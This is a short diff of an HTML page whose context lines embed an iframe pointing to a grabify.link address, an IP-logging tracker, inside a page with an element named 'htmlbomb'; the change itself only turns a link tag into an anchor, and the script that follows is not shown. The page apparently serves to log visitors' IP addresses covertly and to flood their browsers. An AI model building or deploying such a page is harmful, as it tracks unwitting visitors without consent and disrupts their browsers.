--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
     <iframe src="https://grabify.link/W192PS"></iframe>
     
     <div id="htmlbomb">
-      <link href="test.com" target="_blank" id="link1">
+      <a href="test.com" target="_blank" id="link1">e</a>
     </div>
     
     <script>
